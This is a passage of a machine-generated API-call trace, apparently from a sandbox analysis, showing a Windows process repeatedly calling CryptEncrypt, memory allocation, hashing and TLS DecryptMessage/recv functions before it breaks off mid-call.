[0144.797] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.797] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594db4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.797] malloc (_Size=0x1fd) returned 0x3def218 [0144.797] free (_Block=0x0) [0144.797] free (_Block=0x3def010) [0144.797] free (_Block=0x3d81e60) [0144.797] malloc (_Size=0x1fd) returned 0x3def010 [0144.797] free (_Block=0x0) [0144.797] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.797] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.797] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.797] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.797] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.797] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.797] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.798] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.798] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.798] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.798] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.798] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.798] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.798] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.798] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.798] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.798] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.798] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.798] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.798] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.798] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.798] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.798] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.798] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.799] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.799] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.799] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.799] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.799] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.799] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.799] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.799] CryptEncrypt (in: hKey=0x4327b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x605ab4*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0144.799] malloc (_Size=0x1fd) returned 0x3d81e60 [0144.799] free (_Block=0x0) [0144.799] free (_Block=0x3def218) [0144.799] malloc (_Size=0x1fd) returned 0x3def218 [0144.799] free (_Block=0x0) [0144.799] CryptDuplicateHash (in: hHash=0x432eb8, pdwReserved=0x0, dwFlags=0x0, phHash=0x37dfb14 | out: phHash=0x37dfb14) returned 1 [0144.799] CryptHashData (hHash=0x432978, pbData=0x3def218, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0144.799] malloc (_Size=0x14) returned 0x3f652c0 [0144.799] free (_Block=0x0) [0144.800] CryptGetHashParam (in: hHash=0x432978, dwParam=0x2, pbData=0x3f652c0, pdwDataLen=0x37dfacc, dwFlags=0x0 | out: pbData=0x3f652c0, pdwDataLen=0x37dfacc) returned 1 [0144.800] CryptHashData (hHash=0x432eb8, pbData=0x3def218, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0144.800] free (_Block=0x3f652c0) [0144.800] CryptDestroyHash (hHash=0x432978) returned 1 [0144.800] free (_Block=0x3def218) [0144.800] free (_Block=0x3def010) [0144.800] malloc (_Size=0x1fd) returned 0x3def010 [0144.800] free (_Block=0x0) [0144.800] free (_Block=0x0) [0144.800] free (_Block=0x0) [0144.800] SetEvent (hEvent=0x5c8) returned 1 [0144.800] free (_Block=0x0) [0144.800] free (_Block=0x3def010) [0144.800] free (_Block=0x3d81e60) [0144.800] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x80090318 [0144.800] recv (in: s=0x5b0, buf=0x3de7008, len=16413, flags=0 | out: buf=0x3de7008*) returned 543 [0145.362] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x0 [0145.362] malloc (_Size=0x1fd) returned 0x3d81e60 [0145.362] free (_Block=0x0) [0145.362] malloc (_Size=0x1fd) returned 0x3def010 [0145.363] free (_Block=0x0) [0145.363] free (_Block=0x0) [0145.363] free (_Block=0x3d81e60) [0145.363] malloc (_Size=0x1fd) returned 0x3d81e60 [0145.363] free (_Block=0x0) [0145.363] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.363] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.363] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.363] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.363] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.363] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.363] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.363] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.363] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.363] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.363] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.364] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.364] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.364] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.364] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.364] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.364] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.364] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.364] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.364] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.364] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.364] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.364] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.364] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.364] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.364] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.364] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.365] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.365] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.365] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.365] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.365] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.365] malloc (_Size=0x1fd) returned 0x3def218 [0145.365] free (_Block=0x0) [0145.365] free (_Block=0x3def010) [0145.365] free (_Block=0x3d81e60) [0145.365] malloc (_Size=0x1fd) returned 0x3def010 [0145.365] free (_Block=0x0) [0145.365] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.365] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.365] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.365] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.365] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.365] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.365] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.365] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.366] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.366] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.366] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.366] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.366] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.366] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.366] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.366] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.366] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.366] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.366] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.366] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.367] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.367] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.367] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.367] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.367] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.367] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.367] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.367] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.367] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.367] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.367] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.367] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0145.367] malloc (_Size=0x1fd) returned 0x3d81e60 [0145.367] free (_Block=0x0) [0145.367] free (_Block=0x3def218) [0145.367] malloc (_Size=0x1fd) returned 0x3def218 [0145.367] free (_Block=0x0) [0145.367] CryptDuplicateHash (in: hHash=0x432df8, pdwReserved=0x0, dwFlags=0x0, phHash=0x37dfb14 | out: phHash=0x37dfb14) returned 1 [0145.367] CryptHashData (hHash=0x432978, pbData=0x3def218, dwDataLen=0x1fd, 